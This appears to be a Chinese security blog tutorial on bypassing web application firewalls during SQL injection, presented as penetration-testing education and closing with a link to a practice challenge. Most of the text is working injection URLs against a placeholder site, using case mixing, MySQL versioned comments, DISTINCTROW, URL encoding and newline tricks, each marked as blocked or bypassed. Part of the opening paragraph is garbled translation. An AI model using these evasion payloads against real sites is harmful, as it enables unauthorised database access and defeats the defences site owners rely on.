sql注入系列之(bypass waf 1)

文章作者:小椰树

今天,我们将讨论如何在SQL注入中绕过Web应用程序防火墙。本篇文章有点长,所以耐心阅读。

我们大多数人在渗透测试的过程中都会遇到WAF,绕过不分析这部分词是被firewall.so WAF绕过之前你首先要检查的话,一部分是被防火墙***


现在我讲说一下我在渗透测试过程中遇到的一些例子:

例1:

http://www.site.com/php?id=2 uNiOn-- -  [waf]
http://www.site.com/php?id=2 SeLeCt -- - [no waf]


在这里防火墙拦截了"uNiOn"关键词

http://www.site.com/php?id=2 /*!50000uNiOn*/ select 1,2,3,4,5-- -


注:使用大写和小写的组合有时会绕过WAF

“所以我们可以使用大写和小写的组合”,例如:uNiOn SeLeCt 等等


例2:

http://www.site.com/php?id=2 uNiOn-- - [no waf]
http://www.site.com/php?id=2 SeLeCt-- - [no waf]
http://www.site.com/php?id=2 uNiOn SeLeCt [waf]


在这里的防火墙拦截了uNiOn 跟SeLeCt 组合

我们可以尝试如下:

http://www.site.com/php?id=2 uNiOn DISTINCTROW SeLeCt 1,2,3,4,5-- -
http://www.site.com/php?id=2 uNiOn%23%0ASeLeCt 1,2,3,4,5-- -

还有:% 23 = > URL编码的形式#,% 0a = >换行

http://www.site.com/php?id=2 uNiOn DISTINCTROW SeLeCt 1,2,3,4,5-- - [waf]
http://www.site.com/php?id=2 /*!50000uNiOn*/ DISTINCTROW SeLeCt 1,2,3,4,5-- -


例3:

http://www.site.com/php?id=2 uNiOn-- - [waf]
http://www.site.com/php?id=2 SeLeCt-- - [no waf]
http://www.site.com/php?id=2 uNiOn SeLeCt-- - [waf]

来让我们尝试bypass 一下:

http://www.site.com/php?id=2 /*!50000uNiOn*/ SeLeCt-- - [waf]
http://www.site.com/php?id=2 /*!50000uNiOn*/ DISTINCTROW SeLeCt-- - [waf]


url encoding 编码一下:

http://www.site.com/php?id=2 %75nIOn SeLeCt -- -[waf]
http://www.site.com/php?id=2 %75nIOn %73eLeCt-- - [no waf]
这里 %75 => u and %73 => s   {url encoded from}


例4:

http://www.site.com/php?id=2

来让我们尝试一下


http://www.site.com/php?id=2 /*!50000union*/-- - [no waf]
http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/-- - [no waf]
http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/ 1-- - [no waf]
http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/ 1,2-- - [waf]
http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/ 1,~~2-- - (no waf)
http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/ 1,~~2,~~3,~~4,~~5-- - [bypassed]
或者                              
http://www.site.com/php?id=2 uNiOn(/**_**/(seLeCt(1),(2),(3),(4),(5))-- - [bypassed]


最后的作业:

学习了这么多东西,来尝试一下bypass的挑战吧,注入链接如下:

http://zixem.altervista.org/SQLi/level3.php?item=3

文章作者:小椰树

官方网站:www.ms08067.com


本文作者:Ms08067安全实验室

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/130896.html

Tags:
评论  (0)
快来写下你的想法吧!

Ms08067安全实验室

文章数:51 积分: 154

已出版《Web安全攻防》《内网安全攻防》《Python安全攻防》《JAVA代码安全审计(入门篇)》等书

安全问答社区

安全问答社区

脉搏官方公众号

脉搏公众号